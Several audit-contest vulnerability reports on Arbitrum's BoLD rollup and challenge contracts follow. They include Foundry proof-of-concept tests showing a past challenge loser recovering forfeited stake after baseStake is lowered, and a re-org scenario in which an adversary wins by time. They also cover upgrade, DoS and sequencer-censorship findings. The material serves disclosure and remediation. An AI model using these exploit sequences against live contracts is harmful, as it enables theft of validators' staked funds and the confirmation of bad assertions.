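NEW_BASE_STAKE = 8   # baseStake after the admin calls setBaseStake(8)

# Bob lost a challenge: his 10 wei are forfeited, but _stakerMap still records them.
bob_recorded_stake = OLD_BASE_STAKE

# Alice stakes 10 wei on assertion Y (first child of Bob's assertion X),
# which makes Bob's recorded 10 wei withdrawable again.
alice_stake = OLD_BASE_STAKE
bob_withdrawable = bob_recorded_stake

# Bob reduces his deposit to the new baseStake and immediately frees the surplus.
bob_surplus = bob_withdrawable - NEW_BASE_STAKE  # 2 wei Bob can withdraw right away

# Bob re-stakes 8 wei on a child of Y (whose configHash embeds the new baseStake),
# which in turn unlocks Alice's 10 wei.
alice_withdrawn = alice_stake

# Net: Alice is made whole, and Bob recovers 2 wei that should have stayed forfeited.
assert bob_surplus == 2
assert alice_withdrawn == 10
```

The 2 wei Bob recovers are exactly the gap between the old and new baseStake, which is why any past loser benefits whenever the admin lowers the requirement.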

Impact

Any validator that has lost a challenge in the past can steal part of the honest validator's staked funds.

Proof of Concept

Foundry PoC:

Please copy the following POC into Rollup.t.sol:

    function testSuccessSetBaseStake() public {
        vm.prank(upgradeExecutorAddr);
        adminRollup.setBaseStake(8);
    }
    function testPOC_SuccessConfirmEdgeByTime() public returns (SuccessCreateChallengeData memory) {
        SuccessCreateChallengeData memory data = testSuccessCreateChallenge();

        vm.roll(userRollup.getAssertion(genesisHash).firstChildBlock + CONFIRM_PERIOD_BLOCKS + 1);
        vm.warp(block.timestamp + CONFIRM_PERIOD_BLOCKS * 15);
        userRollup.challengeManager().confirmEdgeByTime(
            data.e1Id,
            AssertionStateData(
                data.afterState1,
                genesisHash,
                userRollup.bridge().sequencerInboxAccs(0)
            )
        );
        bytes32 inboxAcc = userRollup.bridge().sequencerInboxAccs(0);
        vm.roll(block.number + userRollup.challengeGracePeriodBlocks());
        vm.prank(validator1);
        userRollup.confirmAssertion(
            data.assertionHash,
            genesisHash,
            data.afterState1,
            data.e1Id,
            ConfigData({
                wasmModuleRoot: WASM_MODULE_ROOT,
                requiredStake: BASE_STAKE,
                challengeManager: address(challengeManager),
                confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                nextInboxPosition: firstState.globalState.u64Vals[0]
            }),
            inboxAcc
        );
        return data;
    }

    function readStakerMap(
        address addr
    )
        public
        returns (
            uint256 amountStaked,
            bytes32 latestStakedAssertion,
            uint64 index,
            bool isStaked,
            address withdrawalAddress
        )
    {
        return (userRollup._stakerMap(addr));
    }

    function testRun_Me_POC() public {
        /*****************
         *****Step -1-*****
         *****************/
        SuccessCreateChallengeData memory data = testPOC_SuccessConfirmEdgeByTime();
        /*@audit-info 
        - `validator1` is the honest validator
        - `validator2` is the adversary validator (aka: Bob)
        - `validator3` is the adversary validator (aka: Alice)
        at this point:
        Bob loses a challenge and his 10 wei (which is the value of the constant `BASE_STAKE`)*/

        /*****************
         *****Step -2-*****
         *****************/
        //Set-up
        uint256 prevInboxCount = data.newInboxCount;
        bytes32 prevHash = userRollup.latestConfirmed();
        AssertionState memory beforeState;
        beforeState = data.afterState1;

        AssertionState memory afterState;
        afterState.machineStatus = MachineStatus.FINISHED;
        afterState.globalState.u64Vals[0] = uint64(prevInboxCount);

        bytes32 inboxAcc = userRollup.bridge().sequencerInboxAccs(1); // 1 because we moved the position within message
        bytes32 expectedAssertionHash = RollupLib.assertionHash({
            parentAssertionHash: prevHash,
            afterState: afterState,
            inboxAcc: inboxAcc
        });

        bytes32 prevInboxAcc = userRollup.bridge().sequencerInboxAccs(0);

        //The honest validator creates the next assertion
        vm.prank(validator1);
        userRollup.stakeOnNewAssertion({
            assertion: AssertionInputs({
                beforeStateData: BeforeStateData({
                    sequencerBatchAcc: prevInboxAcc,
                    prevPrevAssertionHash: genesisHash,
                    configData: ConfigData({
                        wasmModuleRoot: WASM_MODULE_ROOT,
                        requiredStake: BASE_STAKE,
                        challengeManager: address(challengeManager),
                        confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                        nextInboxPosition: afterState.globalState.u64Vals[0]
                    })
                }),
                beforeState: beforeState,
                afterState: afterState
            }),
            expectedAssertionHash: expectedAssertionHash
        });

        /*****************
         *****Step -3-*****
         *****************/
        //The admin calls setBaseStake() to decrease the `baseStake` state variable from 10 wei to 8 wei
        testSuccessSetBaseStake();

        /*****************
         *****Step -4-*****
         *****************/
        //Set-up
        beforeState = data.afterState2;
        afterState.machineStatus = MachineStatus.FINISHED;
        afterState.globalState.u64Vals[0] = uint64(prevInboxCount);

        // `Alice` the adversary validator creates the next assertion
        vm.prank(validator3);
        userRollup.newStakeOnNewAssertion({
            tokenAmount: BASE_STAKE,
            assertion: AssertionInputs({
                beforeStateData: BeforeStateData({
                    sequencerBatchAcc: prevInboxAcc,
                    prevPrevAssertionHash: genesisHash,
                    configData: ConfigData({
                        wasmModuleRoot: WASM_MODULE_ROOT,
                        requiredStake: BASE_STAKE,
                        challengeManager: address(challengeManager),
                        confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                        nextInboxPosition: afterState.globalState.u64Vals[0]
                    })
                }),
                beforeState: beforeState,
                afterState: afterState
            }),
            expectedAssertionHash: bytes32(0),
            withdrawalAddress: validator3Withdrawal
        });

        // NB: you can verify that the adversary validator `Bob` is now able to withdraw his 10 wei
        /*vm.prank(validator2);
        userRollup.returnOldDeposit();*/

        /*****************
         *****Step -5-*****
         *****************/
        //`Bob` triggers `reduceDeposit()` to reduce his staked amount to only 8 wei
        vm.prank(validator2);
        userRollup.reduceDeposit(8);

        /*****************
         *****Step -6-*****
         *****************/
        //`Bob` invokes stakeOnNewAssertion() to create the first child of Alice's assertion
        //Note: `Bob` will lock only 8 wei this time

        //Set-up
        (, bytes32 latestStakedAssertion, , , ) = readStakerMap(validator2);
        uint64 newInboxCount = uint64(_createNewBatch());

        beforeState = afterState;
        prevInboxAcc = userRollup.bridge().sequencerInboxAccs(1);

        AssertionState memory afterStatePOC;
        afterStatePOC.machineStatus = MachineStatus.FINISHED;
        afterStatePOC.globalState.bytes32Vals[0] = keccak256(
            abi.encodePacked(FIRST_ASSERTION_BLOCKHASH)
        ); // blockhash
        afterStatePOC.globalState.bytes32Vals[1] = keccak256(
            abi.encodePacked(FIRST_ASSERTION_SENDROOT)
        ); // sendroot
        afterStatePOC.globalState.u64Vals[0] = newInboxCount; // inbox count
        afterStatePOC.globalState.u64Vals[1] = 0; // pos in msg

        vm.roll(block.number + 75);

        vm.prank(validator2);

        userRollup.stakeOnNewAssertion({
            assertion: AssertionInputs({
                beforeStateData: BeforeStateData({
                    sequencerBatchAcc: prevInboxAcc,
                    prevPrevAssertionHash: latestStakedAssertion,
                    configData: ConfigData({
                        wasmModuleRoot: WASM_MODULE_ROOT,
                        requiredStake: 8,
                        challengeManager: address(challengeManager),
                        confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                        nextInboxPosition: afterStatePOC.globalState.u64Vals[0]
                    })
                }),
                beforeState: beforeState,
                afterState: afterStatePOC
            }),
            expectedAssertionHash: bytes32(0)
        });

        /*****************
         *****Step -7-*****
         *****************/
        //Alice withdraws her 10 wei
        vm.prank(validator3);
        userRollup.returnOldDeposit();

        vm.prank(validator3Withdrawal);
        uint amountWithdrawn = userRollup.withdrawStakerFunds();
        assertEq(amountWithdrawn, 10);

        //Bob withdraws the 2 wei
        vm.prank(validator2Withdrawal);
        amountWithdrawn = userRollup.withdrawStakerFunds();
        assertEq(amountWithdrawn, 2);
    }

Then run: forge test --match-test testRun_Me_POC

Tools Used

Docs Wolf - Manual Review

Recommended Mitigation Steps

Make sure that an adversary validator is not able to come back and recover his funds, e.g. by triggering RollupCore.sol#deleteStaker().
However, with the current tracking system I could not find a way to locate and delete the pending assertions after RollupUserLogic.sol#confirmAssertion() has been called.

Assessed type

Invalid Validation

Upgrades to EdgeChallengeManager using setChallengeManager can allow to confirm bad assertion

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupAdminLogic.sol#L326-L329

Vulnerability details

Description

This report is related to my other report on the EdgeChallengeManager (a.k.a. ECM) upgrade (Upgrades to EdgeChallengeManager changing staking requirement can cause funds loss), so please read that one first; to save both the reader and myself time, I will not re-explain what was covered there.

This report explores the impact of upgrading EdgeChallengeManager.sol entirely (via RollupAdminLogic::setChallengeManager) on the BoLD system overall. This is a new design: previously the stakeToken could be replaced (via RollupAdminLogic::setStakeToken), whereas now the ECM is replaced as a whole (and the new ECM might have a different stakeToken).

While the golang BoLD code is out of scope, there is a key implication for how EdgeChallengeManager.sol and RollupAdminLogic.sol evolve in case of an upgrade, so I believe this should be considered in scope as directly involving those contracts' life cycle, and it seems to warrant High severity.

Validators are connected to a single ECM instance when they start. This can be seen in multiple places in the code, most importantly when creating the AssertionManager (Manager::NewManager); the assertion chain internally uses the same single ECM.

The validators keep polling the blockchain, syncing any new assertion created, and creating a challenge when they detect that an assertion is wrong; this is done inside sync.go. If an ECM upgrade occurs, the following condition triggers once the new ECM instance is made official (RollupAdminLogic::setChallengeManager), which has no real effect besides a logged warning.

	if args.canonicalParent.ChallengeManager != m.challengeManagerAddr {
		srvlog.Warn("Posted rival assertion, but could not challenge as challenge manager address did not match, "+
			"start a new server with the right challenge manager address", log.Ctx{
			"correctAssertion":                  postedRival.AssertionHash,
			"evilAssertion":                     args.invalidAssertion.AssertionHash,
			"expectedChallengeManagerAddress":   args.canonicalParent.ChallengeManager,
			"configuredChallengeManagerAddress": m.challengeManagerAddr,
		})
		return nil, nil
	}

We can see that a validator supporting BoLD would most likely use the following code (or something similar; this is from a test, but it would pull the ECM from the Rollup too) to pull the new ECM instance. Even if the ECM address could be specified manually, I don't think the current integration supports a validator running multiple instances of the BoLD protocol; at least it doesn't seem to have been built for that out of the box (but I could be wrong).

	challengeManagerAddr, err := assertionChainBinding.RollupUserLogicCaller.ChallengeManager(
		util.GetSafeCallOpts(&bind.CallOpts{Context: ctx}),
	)

Impacts

  1. (front-run) If all honest validators restart as soon as the warning is seen, that would leave the old ECM with unfinished challenge(s), which could mean stuck challenges and/or a bad assertion being confirmed. For example, an evil validator could front-run the setChallengeManager call and post a bad assertion against the old ECM, which would never be challenged and could be confirmed later by the evil validator.
  2. (back-run) If the honest validators don't restart for a long enough period (enough time for the assertion to be confirmed by time, i.e. 6.36 days), a bad assertion could be confirmed on the new ECM instance by an evil validator who submitted the new assertion as soon as it detected the setChallengeManager call.
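For reference, the 6.36-day window cited above is consistent with the confirmation period measured in L1 blocks. The sketch below assumes a period of 45818 blocks and 12-second L1 blocks; both numbers are my assumptions for illustration, not values read from this repo:

```python
# Rough check of the "6.36 days" figure cited in the report.
# Assumes confirmPeriodBlocks = 45818 and 12-second L1 blocks (illustrative values).
CONFIRM_PERIOD_BLOCKS = 45818
L1_BLOCK_SECONDS = 12
SECONDS_PER_DAY = 86400

days = CONFIRM_PERIOD_BLOCKS * L1_BLOCK_SECONDS / SECONDS_PER_DAY
assert round(days, 2) == 6.36  # matches the confirm-by-time window above
```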

Proof of Concept

This showcases Impact 2, which seems more likely to happen in production. There are three actors in play: the Admin, an Honest validator, and an Evil validator.

  1. The Admin deploys the ECM contract. Everything runs smoothly for days.
  2. The Admin decides to upgrade the contract to change the staking requirement, which requires a full upgrade and a call to setChallengeManager.
  3. The Evil validator is monitoring the mempool and sees the incoming setChallengeManager transaction. It decides to back-run it and posts a bad assertion against the new ECM instance.
  4. The Honest validator keeps running smoothly; while it detects that this assertion is bad and requires a challenge, it will not challenge it because the assertion belongs to another ECM instance. It posts a warning in the logs, but takes no other action.
  5. After 6.36 days (a.k.a. the current challengePeriodBlocks value), the Evil validator will be able to confirm the assertion, as it will not have been challenged (the Honest validator, not having restarted, will still be challenging only against the old ECM). Furthermore, challengeGracePeriodBlocks will not be considered since, again, this assertion was never challenged.
        if (prevAssertion.secondChildBlock > 0) {
            // if the prev has more than 1 child, check if this assertion is the challenge winner
            ChallengeEdge memory winningEdge = IEdgeChallengeManager(prevConfig.challengeManager).getEdge(winningEdgeId);
            require(winningEdge.claimId == assertionHash, "NOT_WINNER");
            require(winningEdge.status == EdgeStatus.Confirmed, "EDGE_NOT_CONFIRMED");
            require(winningEdge.confirmedAtBlock != 0, "ZERO_CONFIRMED_AT_BLOCK");
            // an additional number of blocks is added to ensure that the result of the challenge is widely
            // observable before it causes an assertion to be confirmed. After a winning edge is found, it will
            // always be challengeGracePeriodBlocks before an assertion can be confirmed
            require(
                block.number >= winningEdge.confirmedAtBlock + challengeGracePeriodBlocks,
                "CHALLENGE_GRACE_PERIOD_NOT_PASSED"
            );
        }

Recommended Mitigation Steps

Mitigation from the BoLD implementation - Approach One

  1. Have the validator BoLD implementation listen for the OwnerFunctionCalled event and, when id 32 is detected (a setChallengeManager upgrade), instantiate another instance of the BoLD implementation. Yes, that would mean a validator can run multiple instances of the BoLD implementation at the same time; if this is not supported, support would need to be added.
    function setChallengeManager(address _challengeManager) external {
        challengeManager = IEdgeChallengeManager(_challengeManager);
        emit OwnerFunctionCalled(32);
    }
  2. Keep track of which challenges are in progress, and once all assertions on the old ECM are confirmed, the validator can kill that BoLD instance.
  3. This tracking would also add robustness: if the validator restarts (crash or maintenance) after an upgrade, it should also spawn an instance against the old ECM (in addition to the one it would spawn anyway for the current ECM) in order to complete those challenge(s).

Mitigation from the BoLD implementation - Approach Two

A completely different option would be to keep a single instance of the BoLD protocol running in the validator, but refactor it so that it is not bound to a single ECM and instead interacts with the corresponding ECM based on where the assertion was created.

Mitigation from the ECM

Another option would be to allow only normal upgrades and track the staking requirement inside the Challenge struct, as suggested in my other report. This would remove the need to do a full upgrade that also changes the proxy and creates this whole issue.

Assessed type

Upgradable

Adversary can win the dispute game in a re-org event

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L160-L201
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L411-L439

Vulnerability details

Impact

Malicious parties can win the dispute game in a re-org event.

Proof of Concept

    function add(EdgeStore storage store, ChallengeEdge memory edge) internal returns (EdgeAddedData memory) {
        // ...
        if (firstRival == 0) {
            store.firstRivals[mutualId] = UNRIVALED;
        } else if (firstRival == UNRIVALED) {
            store.firstRivals[mutualId] = eId;
        } else {
            // no-op: firstRival is already set
        }
        // ...
    }

When a layer-zero edge or bisection child edges are created, all of those edges are added to the edge store and their first rival is set. If an edge is the first one added for a given mutual ID, its first rival is set to UNRIVALED; when a second edge with the same mutual ID arrives, the first rival is set to that second edge's ID.
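The firstRival bookkeeping just described can be modeled in a few lines (an illustrative Python model of the state machine, not the Solidity code):

```python
# Minimal model of the firstRival bookkeeping described above (illustrative only).
UNRIVALED = "UNRIVALED"

first_rivals = {}  # mutualId -> UNRIVALED | id of the first rival edge

def add_edge(mutual_id, edge_id):
    current = first_rivals.get(mutual_id)
    if current is None:
        # first edge for this mutualId: mark it unrivaled
        first_rivals[mutual_id] = UNRIVALED
    elif current == UNRIVALED:
        # second edge: it becomes the first rival and pins the value
        first_rivals[mutual_id] = edge_id
    # third and later edges: firstRival is already pinned, nothing changes

add_edge("m1", "edge1")
assert first_rivals["m1"] == UNRIVALED
add_edge("m1", "edge2")
assert first_rivals["m1"] == "edge2"
add_edge("m1", "edge3")
assert first_rivals["m1"] == "edge2"  # stays pinned to the first rival
```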

POC
1. Malicious party Alice creates layer-zero edge id 1.

2. The first rival of that mutual ID is set to UNRIVALED.

3. Honest party Bob creates layer-zero edge id 2 with the same mutual ID as edge 1.

4. The first rival of that mutual ID is set to edge id 2.

5. The honest party bisects his edge, creating two child edges, and waits for Alice's turn to create rivals for his child edges.

6. Unfortunately, a re-org happens at the block where Bob created layer-zero edge id 2.

7. The first rival of the mutual ID for both layer-zero edges 1 & 2 is set back to UNRIVALED.

8. Bob, unaware of the re-org, keeps waiting for rivals to his child edges from the malicious party.

9. Malicious Alice's UNRIVALED time is now larger than Bob's, because she has been UNRIVALED since she created layer-zero edge 1.

10. Malicious Alice can front-run Bob and call confirmEdgeByTime ahead of him.
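The timer effect in steps 6-10 can be modeled with a few lines (an illustrative sketch of unrivaled-time accrual, not the contract's actual bookkeeping; block numbers are made up):

```python
# Sketch of how a re-org that erases the rival inflates Alice's unrivaled timer.
def time_unrivaled(created_at, first_rival_block, now):
    # unrivaled time accrues from creation until the first rival appears;
    # with no rival recorded, it keeps accruing up to the current block
    end = now if first_rival_block is None else first_rival_block
    return end - created_at

# Alice creates edge 1 at block 100; Bob rivals it at block 110.
assert time_unrivaled(100, 110, now=200) == 10

# A re-org drops Bob's rivaling transaction: firstRival is UNRIVALED again,
# so Alice's timer silently resumes accruing from block 100.
assert time_unrivaled(100, None, now=200) == 100
```

This is why, after the re-org, Alice's edge can accumulate enough unrivaled time to be confirmed by time ahead of Bob's.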

Add a ResetFirstRival helper to EdgeChallengeManager.sol (to simulate the re-org in tests):

    function ResetFirstRival(bytes32 mutualId) public {
        store.firstRivals[mutualId] = keccak256(abi.encodePacked("UNRIVALED"));
    }

Add the following test to EdgeChallengeManager.t.sol:

    function testReorg() public returns (EdgeInitData memory, bytes32) {
    (EdgeInitData memory ei, bytes32[] memory states1,, bytes32 edge1Id) = testCanCreateEdgeWithStake();

    _safeVmRoll(block.number + NUM_BLOCK_UNRIVALED);

    assertEq(ei.challengeManager.timeUnrivaled(edge1Id), NUM_BLOCK_UNRIVALED, "Edge1 timer");
    
        bytes32[] memory states2 = a2RandomStates;
        bytes32[] memory exp2 = a2RandomStatesExp;
        bytes32 edge2Id = ei.challengeManager.createLayerZeroEdge(
            CreateEdgeArgs({
                level: 0,
                endHistoryRoot: MerkleTreeLib.root(exp2),
                endHeight: height1,
                claimId: ei.a2,
                prefixProof: abi.encode(
                    ProofUtils.expansionFromLeaves(states2, 0, 1),
                    ProofUtils.generatePrefixProof(1, ArrayUtilsLib.slice(states2, 1, states2.length))
                ),
                proof: abi.encode(
                    ProofUtils.generateInclusionProof(ProofUtils.rehashed(states2), states2.length - 1),
                    genesisStateData,
                    ei.a2Data
                )
            })
        );

      

        _safeVmRoll(block.number + NUM_BLOCK_WAIT);
        assertEq(ei.challengeManager.timeUnrivaled(edge1Id), NUM_BLOCK_UNRIVALED, "Edge1 timer");
        assertEq(ei.challengeManager.timeUnrivaled(edge2Id), 0, "Edge2 timer");
    

    BisectionChildren memory children = bisect(ei.challengeManager, edge1Id, states1, 16, states1.length - 1);

    _safeVmRoll(block.number + 3);


    BisectionChildren memory children2 = bisect(ei.challengeManager, edge2Id, states2, 16, states2.length - 1);

    assertEq(ei.challengeManager.timeUnrivaled(edge1Id), 2, "Edge1 timer");

    _safeVmRoll(block.number + 3);
    
    //*@audit-info ------->>> the last bisection is done by edge 2 
    BisectionChildren memory children3 = bisect(ei.challengeManager, children2.lowerChildId, states2, 8, 16);

    assertEq(ei.challengeManager.timeUnrivaled(edge1Id), 2, "Edge1 timer");

    ChallengeEdge memory edge = ei.challengeManager.getEdge(edge1Id);

    bytes32 mutualId = edge.mutualIdMem();
    
    //*@audit-info ------>>> re-org happens here
    ei.challengeManager.ResetFirstRival(mutualId);
    
    assertEq(ei.challengeManager.timeUnrivaled(edge1Id), 11, "Edge1 timer");


    _safeVmRoll(block.number + challengePeriodBlock );

    ei.challengeManager.updateTimerCacheByChildren(children3.lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(children3.upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(children2.lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(children2.upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(children.lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(children.upperChildId);
    ei.challengeManager.confirmEdgeByTime(edge1Id, ei.a1Data);
    vm.expectRevert(abi.encodeWithSelector(RivalEdgeConfirmed.selector, edge2Id, edge1Id));
    ei.challengeManager.confirmEdgeByTime(edge2Id, ei.a2Data);

    assertTrue(ei.challengeManager.getEdge(edge1Id).status == EdgeStatus.Confirmed, "Edge confirmed");

    return (ei, edge1Id);
}

Tools Used

Manual review

Recommended Mitigation Steps

Once rivals are born, there is no reason to ever go back to UNRIVALED. So when a rival is born, record the unrivaled time at that point and do not count any further UNRIVALED time for that edge.

Assessed type

Context

`newStakeOnNewAssertion(...)` will revert due to wrong logic implementation in the `RollupUserLogic` contract

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L210-L216
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L331-L342
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L366-L368
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/assertionStakingPool/AssertionStakingPool.sol#L40-L46

Vulnerability details

Impact

Users will not be able to create assertions, leading to a DoS on a core functionality of the protocol.

Proof of Concept

Note that the IRollupUser rollup contract is not deployed with funds deposited in it.

Users create an assertion using the AssertionStakingPool::createAssertion(...) function; at a high level, the order of execution is as shown below:

L0 -> AssertionStakingPool::createAssertion(...)
L1 --> IERC20(stakeToken).safeIncreaseAllowance(rollup, ...)
L2 --> IRollupUser(rollup)::newStakeOnNewAssertion(...)
L3 ---> RollupUserLogic::newStakeOnNewAssertion(...)
...
L4 ----> RollupUserLogic::stakeOnNewAssertion(...)
....
L5 -----> IERC20(stakeToken).safeTransfer(loserStakeEscrow, .requiredStake) 
L6 --> receiveTokens(tokenAmount);
L7 ---> IERC20(stakeToken).safeTransferFrom(msg.sender, address(this), tokenAmount) 

I have marked the portions of interest (L1, L2, L5 and L7) in this high-level trace. Let's go over the important steps:

  • L1 - the creator of the assertion gives the rollup contract an allowance (1) to spend their stake in order to create the assertion
  • L2 - the rollup contract starts the creation of the assertion
  • L5 - the rollup contract transfers an amount equal to the user's stake to the loserStakeEscrow contract from its own stakeToken balance (at this point its balance may be less than requiredStake)
  • L7 - the rollup contract collects the user's stake from the user

However, when there are no funds in the rollup contract, the AssertionStakingPool::createAssertion(...) call will revert at L5, because in the current implementation the order of execution requires the rollup contract to transfer funds to the loserStakeEscrow before actually receiving the funds from the user who is creating the assertion.
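The ordering problem can be sketched as a toy balance model (illustrative Python only; it assumes the assertion is not a first child, so the loserStakeEscrow transfer applies):

```python
# Toy model of the transfer ordering described above (illustrative, not contract code).
class Revert(Exception):
    pass

def create_assertion(rollup_balance, required_stake, pull_user_funds_first):
    if pull_user_funds_first:
        rollup_balance += required_stake   # receiveTokens: pull the user's stake first
        rollup_balance -= required_stake   # then pay loserStakeEscrow
    else:
        # current order: pay loserStakeEscrow BEFORE receiveTokens
        if rollup_balance < required_stake:
            raise Revert("safeTransfer to loserStakeEscrow fails")
        rollup_balance -= required_stake
        rollup_balance += required_stake   # receiveTokens happens too late
    return rollup_balance

# With an empty rollup balance, the current ordering reverts...
try:
    create_assertion(0, 10, pull_user_funds_first=False)
    reverted = False
except Revert:
    reverted = True
assert reverted

# ...while pulling the user's stake first succeeds and leaves the balance unchanged.
assert create_assertion(0, 10, pull_user_funds_first=True) == 0
```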

File: AssertionStakingPool.sol
40:     function createAssertion(AssertionInputs calldata assertionInputs) external {
41:         uint256 requiredStake = assertionInputs.beforeStateData.configData.requiredStake;
42:         // approve spending from rollup for newStakeOnNewAssertion call
43:         IERC20(stakeToken).safeIncreaseAllowance(rollup, requiredStake);
44:         // reverts if pool doesn't have enough stake and if assertion has already been asserted
45:         IRollupUser(rollup).newStakeOnNewAssertion(requiredStake, assertionInputs, assertionHash, address(this));
46:     }

File: RollupUserLogic.sol
331:     function newStakeOnNewAssertion(
332:         uint256 tokenAmount,
333:         AssertionInputs calldata assertion,
334:         bytes32 expectedAssertionHash,
335:         address withdrawalAddress
336:     ) public {
337:         require(withdrawalAddress != address(0), "EMPTY_WITHDRAWAL_ADDRESS");
338:         _newStake(tokenAmount, withdrawalAddress);
339:         stakeOnNewAssertion(assertion, expectedAssertionHash);
340:         /// @dev This is an external call, safe because it's at the end of the function
341:         receiveTokens(tokenAmount);
342:     }
...

163:     function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
164:         public
165:         onlyValidator
166:         whenNotPaused
167:     {
...
210:         if (!getAssertionStorage(newAssertionHash).isFirstChild) {
216:             // We assume assertion.beforeStateData is valid here as it will be validated in createNewAssertion
217:             // only 1 of the children can be confirmed and get their stake refunded
218:             // so we send the other children's stake to the loserStakeEscrow
219:             // NOTE: if the losing staker have staked more than requiredStake, the excess stake will be stuck
220:  @>         IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake);
221:         }
...

366:     function receiveTokens(uint256 tokenAmount) private {
367:  @>     IERC20(stakeToken).safeTransferFrom(msg.sender, address(this), tokenAmount);
368:     }

PoC Summary

  • the current stakeToken balance of the rollup contract is zero or less than requiredStake
  • Alice calls AssertionStakingPool::createAssertion(...) to create a new assertion
  • the rollup tries to forward Alice's requiredStake to the loserStakeEscrow, but the function reverts because the rollup does not yet hold the requiredStake amount of stakeToken
  • Alice's assertion cannot be created because the call reverts

Tools Used

Manual review

Recommended Mitigation Steps

Modify the RollupUserLogic::newStakeOnNewAssertion(...) function as shown below

File: RollupUserLogic.sol
331:     function newStakeOnNewAssertion(
332:         uint256 tokenAmount,
333:         AssertionInputs calldata assertion,
334:         bytes32 expectedAssertionHash,
335:         address withdrawalAddress
336:     ) public {
337:         require(withdrawalAddress != address(0), "EMPTY_WITHDRAWAL_ADDRESS");
338:         _newStake(tokenAmount, withdrawalAddress);

339: -       stakeOnNewAssertion(assertion, expectedAssertionHash);
340: -       /// @dev This is an external call, safe because it's at the end of the function
341: -       receiveTokens(tokenAmount);

339: +       receiveTokens(tokenAmount);
340: +       /// @dev This is an external call, safe because it's at the end of the function
341: +       stakeOnNewAssertion(assertion, expectedAssertionHash);

342:     }

The rollup should move the funds from the user’s account before it calls stakeOnNewAssertion(...).

Assessed type

DoS

L2 sequencer can exploit L3 chains using force inclusion delays

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/bridge/SequencerInbox.sol#L314
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/ChallengeEdgeLib.sol#L250-L251

Vulnerability details

Cause

The BOLD dispute protocol requires multiple turn-based steps. When deployed on an L2 to enable the L3 use case, the L2 sequencer can exploit the L3: it can censor honest validators' dispute moves and force them to use the L1 force-inclusion mechanism. This allows the sequencer to attack, or collude with an attacker, to create invalid assertions for L3 chains settling to L2. By forcing honest L3 validators through the L1 force-inclusion mechanism, their transactions are included on L2 via L1 with a delay of up to 24 hours for each turn. As the dispute requires many tens of turns (around 50) to complete, these accumulated delays cause the honest validators to lose.

Impact

The sequencer can submit arbitrary withdrawals and drain any L3 deployed on the L2. While in general the sequencer should not be able to cause any safety violations for the sequenced chain, in this case it can use its limited censorship ability to violate the safety of any L3 by preventing the timely progress of its dispute games.

The dispute requires around 50 turn-based steps from an honest participant, each of which can be delayed by up to 24 hours. Because each participant is limited to a 7-day chess clock, honest participants can be forced to lose due to the L1 inclusion delays alone. This allows the attacker to confirm an arbitrary assertion and prove arbitrary withdrawals from all L3 chains using BOLD on the L2.

Notably, even if the maximum or average delay can be reduced, with 50 turn-based steps the 7-day clock would be exhausted by the delays alone even at only 4 hours per turn. And even if the average delay could be reduced to 2 hours, this would leave the honest validators far less time than needed to reliably guarantee the safety of the chain under the protocol's assumptions.
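The delay budget above is simple arithmetic, sketched here for concreteness (using the report's figures of 50 moves and a 7-day chess clock):

```python
# Back-of-the-envelope delay budget from the paragraph above.
MOVES = 50        # turn-based honest moves per dispute (report's estimate)
CLOCK_DAYS = 7    # per-participant chess clock

# At 24h or even 4h of forced-inclusion delay per move, the delays alone
# exceed the entire 7-day clock.
for delay_hours in (24, 4):
    total_days = MOVES * delay_hours / 24
    assert total_days > CLOCK_DAYS

# Even at a 2-hour average delay, ~4.2 of the 7 days are consumed by delays.
assert round(MOVES * 2 / 24, 1) == 4.2
```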

L3s BOLD deployments are in scope

While this is only relevant for L3s using BOLD on L2s (i.e. on Arbitrum itself), and not for L2s using BOLD on L1, the scope of this contest clearly includes the L3 use case:

Q: For an L3 Orbit chain, secured using BOLD, that settles to Arbitrum One, does the one-step proof happen on Arbitrum One?
A: Yes

Participant: "And it will be work work layer 3 on arbitrum as well that want a implement the bold mechanism"
Sponsor: "yeah that's right"

Severity

Because the sequencer is not trusted with the safety of L3s, and is not trusted within the scope of fault proofs, the severity is high. This is true not only due to the trust guarantees but also due to the intention to decentralize the sequencer role. The loss of funds and trust in the system would be catastrophic, given the total loss of funds that the L2 sequencer operator is capable of inflicting on the L3s.

Proof of Concept

As can be seen in the testCanConfirmByOneStep test, which runs a challenge from start to finish, if a dishonest assertion is made the honest validator must complete the full dispute.

  • The full dispute involves 6 levels: block level, then 4 intermediate levels, and a final SmallStep level. Additionally, a final confirmEdgeByOneStepProof must be called to prove the final small step single instruction on-chain to prevent the dishonest edge from being confirmed by time and its assertion being confirmed. This amounts to 6 levels and 1 additional call.

